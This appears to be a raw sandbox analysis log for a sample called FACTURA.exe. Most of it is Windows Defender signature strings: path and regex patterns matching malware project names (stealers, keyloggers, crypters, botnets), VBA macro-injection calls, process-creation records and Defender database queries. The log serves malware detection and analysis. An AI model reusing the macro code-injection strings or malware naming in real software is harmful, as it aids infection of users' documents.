Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp Binary or memory string: 0Desktop\war\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: vC:\Program Files\Microsoft Visual Studio\VB98\pjtbinder.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: Final RS Stealer\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp Binary or memory string: 1,.+:\\.+\\Desktop\\Yeni Klas.+\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: SN.+\\(BotSupho Compiler|BotSupHo\\.+?\\Server(new)?)(\\Server)?\\Project2\.vbp
Source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp Binary or memory string: \Asterios\Heriposter.vbpxe
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: Dicionario.vbp
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp Binary or memory string: \ADWARA\prjX.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: C:\\Users\\box1\\Desktop\\7black2\\[a-zA-Z]{10,}.vbp
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp Binary or memory string: B=.+\\installscash nno form wow downloader\\mycc\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: `D:\Master\bb_soft\n_07_10_2008\bb_bho\VBBHO.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: .+\\Viruses\\Black Project\\Dark_Love.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp Binary or memory string: \\Laboratorio de Virus\\WinXP\\Downloader.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: ao com erro\PrjMain.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: mt Download .vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: 0FileEZ HTTP\ServiceSample.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: C:\\WINDOWS\\system32\\config\\systemprofile\\.+\\Noway.vbp
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: PE:\Coba Software\Virus\BRR\MOTTO_BRR.vbp
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: ,z:\abc\load\kombi.vbpxM
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp Binary or memory string: @\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: D:\\Main JOHN\\Recovered KILL\\.*Main Uploader\\ServiceSample.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: D:\\(BitComet|BingDun|3D Driving-School)\\[a-zA-Z0-9]{10,30}\\(builder|ad)\.vbp
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp Binary or memory string: 8Business\Kitty Logger\KL.vbp]
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp Binary or memory string: ..\Desktop\Startup\Bitar.vbpxN
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp Binary or memory string: .+:\\.+\\fuckADX\\.+\\ADs.*\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: 4/.+\\Apr 14 2011 FileEZ HTTP\\ServiceSample.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: :D:\Master\bb_soft\new\dll.vbp
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp Binary or memory string: F*\AD:\Junk Programs\Test_Passw20243252017\TestPwd\TestPwd.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp Binary or memory string: 2Crypt3r\demonio666vip.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp Binary or memory string: P\AYO.vbp
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp Binary or memory string: \Pack.vbp
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp Binary or memory string: C:\\Xinfiltrate STUB\\[a-zA-Z]{3,20}.vbp
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp Binary or memory string: C:\Arquivos de programas\Microsoft Visual Studio\VB98\Projetos.frm\Flame Kill\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp Binary or memory string: .+:\\.+\\rkmVirus\\Yahoo Server\\.+\\rkmVirusYahoo.*\\.+.vbp
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp Binary or memory string: papnsappsapusap5tap[yapmyapgabpagbptubp.vbp.wbpu.cpo_cprecpvicp
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp Binary or memory string: \KDWIN\KDWin.vbp
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp Binary or memory string: .VBProject.VBComponents(1).CodeModule.deletelines
Source: MpSigStub.exe, 00000024.00000003.6321140724.00000197A3AFC000.00000004.00000001.sdmp Binary or memory string: \C:\ZKing8\WinZ\WSP\RenoNevada\FTPREM\MyFTP.vbp
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp Binary or memory string: Pinball.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp Binary or memory string: \WINDOWS.VBP]
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp Binary or memory string: &\SelectCaseEnum.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: .+\\Apr 14 2011 FileEZ HTTP\\ServiceSample.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: ?:.+\\Abdallah\\.+\\iCrypt2.+\\stub_resources\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: .:\\Explorer\\Explorer.vbp
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp Binary or memory string: .vbpa)
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: \Virus\Romeo.vbp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: DC:\Base de donnee\test\Projet1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: .+keylogger.+server\.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: -(.+\\mStubmmmm\\Backup.+\\lSUpRQlvPd.vbp
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp Binary or memory string: A*\AE:\My Programs\Trojans, PS,Hack , Crack\Molela\Molela 1.15 beta\Server\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: \\cryptor.+\\Project1\.vbp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: Desktop\Russia\Error.vbp
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp Binary or memory string: \AYO.vbp
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp Binary or memory string: C:\Archivos de programa\Microsoft Visual Studio\VB98\Proyecto1.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: ^AJ:\MASTER\ad_compiler\moy.exe\balvanka\ZAG.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: :5.+\\Hell Packer.+\\gregstubs\\HEX\\HEX\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: 3..+\\Cyborg-Crypt-Source\\634z7\\Projekt1\.vbp
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp Binary or memory string: .vbp
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp Binary or memory string: E@.+:\\Work\\test\\.+\\Mouchafer\\.+\\.+\\.+_Generated-.*\\.+.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp Binary or memory string: 3.\\Laboratorio de Virus\\WinXP\\Downloader.vbp
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp Binary or memory string: 2*\AC:\y0Za8\wpad\wpad.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: BD:\Master\bb_soft\not_est\dll.vbp
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp Binary or memory string: *\AC:\Users\Administrator\Desktop\VB2\osama.vbpx
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: GBD:\\Main JOHN\\Recovered KILL\\.*Main Uploader\\ServiceSample.vbp
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp Binary or memory string: cMicroLab.vbp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp Binary or memory string: C>:\\.+\\Bkoli Hazm\\Lostdoor.+\\Client.+\\Helminth_Project.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp Binary or memory string: TroyanExplore\Instalar.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp Binary or memory string: D:\\Apple\\VB.*google\\.*\.vbp
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: VQ.+:\\Documents and Settings\\PC-[0-9]{1,3}\\Desktop\\loader fileVB\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: 8my programs\I_R\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp Binary or memory string: nh AV\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: .+\\My Botnet( Source)?\\Server\\Project1\.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: \gugu.vbp]
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp Binary or memory string: % .+:\\SO_GF\\puxador\\office.vbp
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp Binary or memory string: HKnamemom.vbpa
Source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp Binary or memory string: \Simplesso.vbp
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp Binary or memory string: -powerword\PowerWord.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: <\ALLROUND STEALER\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: 4/.+\\My Botnet( Source)?\\Server\\Project1\.vbp
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp Binary or memory string: \Bonus 1.5.vbp
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp Binary or memory string: C:\\Users\\GavaLarr\\Desktop\\Windows\\prjSchool.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: 6@*\AC:\server\Tarantula.vbp
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp Binary or memory string: hider\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp Binary or memory string: ysp\ysp.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp Binary or memory string: .+:\\.+\\Desktop\\Yeni Klas.+\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: C:\\Documents and Settings\\Administrador\\Mis documentos\\Trabajo Empresarial de Luis\\.*.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: :Black Dream\Server\Server.vbp]
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: d_C:\\Documents and Settings\\Administrador\\Mis documentos\\Trabajo Empresarial de Luis\\.*.vbp
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp Binary or memory string: 8\MicroProCon\FileConfig.vbp
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp Binary or memory string: .VBProject.VBComponents("ThisDocument").CodeModule.AddFromString
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: |C:\Documents and Settings\Diego\Desktop\gold hack\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp Binary or memory string: ..\Desktop\Startup\Bitar.vbp
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp Binary or memory string: .+:\\SO_GF\\puxador\\office.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp Binary or memory string: fzx9823.vbp
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp Binary or memory string: 1.VBProject.VBComponents(1).CodeModule.insertlines
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp Binary or memory string: A*\AC:\Users\Joke_codder\Desktop\RSRS\fvgbhncfvgbhnjm.vbpx
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: .+\\Virus Maker\\s1\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp Binary or memory string: 72C:\\Program Files\\jarrcod\\mesopotamia_cellt.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp Binary or memory string: C:\\.+\\www.microfost.com -3.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: .+\\Cyborg-Crypt-Source\\634z7\\Projekt1\.vbp
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp Binary or memory string: `@*\AC:\PiElcestial-udtools-net-indetectables.vbp
Source: C:\Users\user\Desktop\FACTURA.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\FACTURA.exe 'C:\Users\user\Desktop\FACTURA.exe'
Source: C:\Users\user\Desktop\FACTURA.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 848
Source: C:\Users\user\Desktop\FACTURA.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 856
Source: unknown Process created: C:\Windows\System32\oobe\UserOOBEBroker.exe C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
Source: unknown Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-5e107659.exe' /q WD
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.16.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-5e107659.exe /q WD
Source: unknown Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\3A24BB4C-F6EB-A1AC-C6CC-E780FED56A57.man
Source: C:\Windows\System32\wevtutil.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\3A24BB4C-F6EB-A1AC-C6CC-E780FED56A57.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Source: C:\Windows\System32\wevtutil.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-fad3e9a8.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.16.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-5e107659.exe /q WD Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\oobe\UserOOBEBroker.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\FACTURA.exe File created: C:\Users\user\AppData\Local\Temp\~DFB539126E96AF4C2D.TMP Jump to behavior
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp Binary or memory string: SELECT 1 FROM SQLITE_MASTER WHERE type=? AND name=? LIMIT 1;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FileLowFiAsync(Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp) VALUES(?, ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AnomalyInfo(Key, UnbiasedTime) VALUES (?, ?);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(13, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM AutoFeatureControl;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT DISTINCT TableName FROM AnomalyTables;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RollingQueuesTables(Key, Name, Capacity, TimeToLive, Mode) VALUES(? , ? , ? , ? , ?); DELETE FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?; DELETE FROM RollingQueuesTables WHERE (Name NOT IN (SELECT DISTINCT EntryTable FROM RollingQueuesValues)); SELECT Key, Name, Capacity, TimeToLive, Mode FROM RollingQueuesTables WHERE Key = ?; SELECT Key FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?; SELECT EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime FROM RollingQueuesValues WHERE EntryTable = ?; INSERT INTO RollingQueuesValues(EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); DELETE FROM RollingQueuesValues WHERE ExpireTime < ?; DELETE FROM RollingQueuesTables; DELETE FROM RollingQueuesValues; SELECT COUNT(1) FROM RollingQueuesValues; Failed to fetch row from prepared statement.Failed to get column from prepared statement.Failed to bind value to prepared statement.
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM FileHashes WHERE FileHashes.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM RansomwareDetections;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM NetworkIpFirewallRules;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RollingQueuesValues(EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000024.00000003.6232616748.00000197941BB000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime, UpdateTime FROM AtomicCounters WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n FROM FileHashes WHERE Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AutoFeatureControl(Key, CurrCount, MaxCount, InstanceTimeStamp) VALUES (?, ?, ?, ?);DELETE FROM AutoFeatureControl;DELETE FROM AutoFeatureControl WHERE InstanceTimeStamp < ?; SELECT ID FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;SELECT Key, CurrCount, MaxCount, InstanceTimeStamp FROM AutoFeatureControl WHERE Key = ?DELETE FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;SELECT Count(1) FROM AutoFeatureControl;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM FileLowFiAsync;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces FROM BackupProcessInfo WHERE Key = ?;SELECT Count(1) FROM BackupProcessInfo;SELECT ID FROM BackupProcessInfo WHERE Key = ?;INSERT INTO BackupProcessInfo(Key, FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?);DELETE FROM BackupProcessInfo WHERE Key = ?;DELETE FROM BackupProcessInfo WHERE InstanceTimeStamp < ?; ^;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID from RecordIdentifier WHERE Key = ? AND RecordTimeStamp = ? ;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SystemFileCache WHERE CleanFileShaHash = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(6, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(14, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;SELECT UserId, GUID, Path FROM FolderGuardPaths WHERE UserIdHash = ?SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;DELETE FROM FolderGuardPaths WHERE UserIdHash = ?;N
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(4, 1, date('now'));
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Capacity, TimeToLive, Mode FROM RollingQueuesTables WHERE Key = ?;
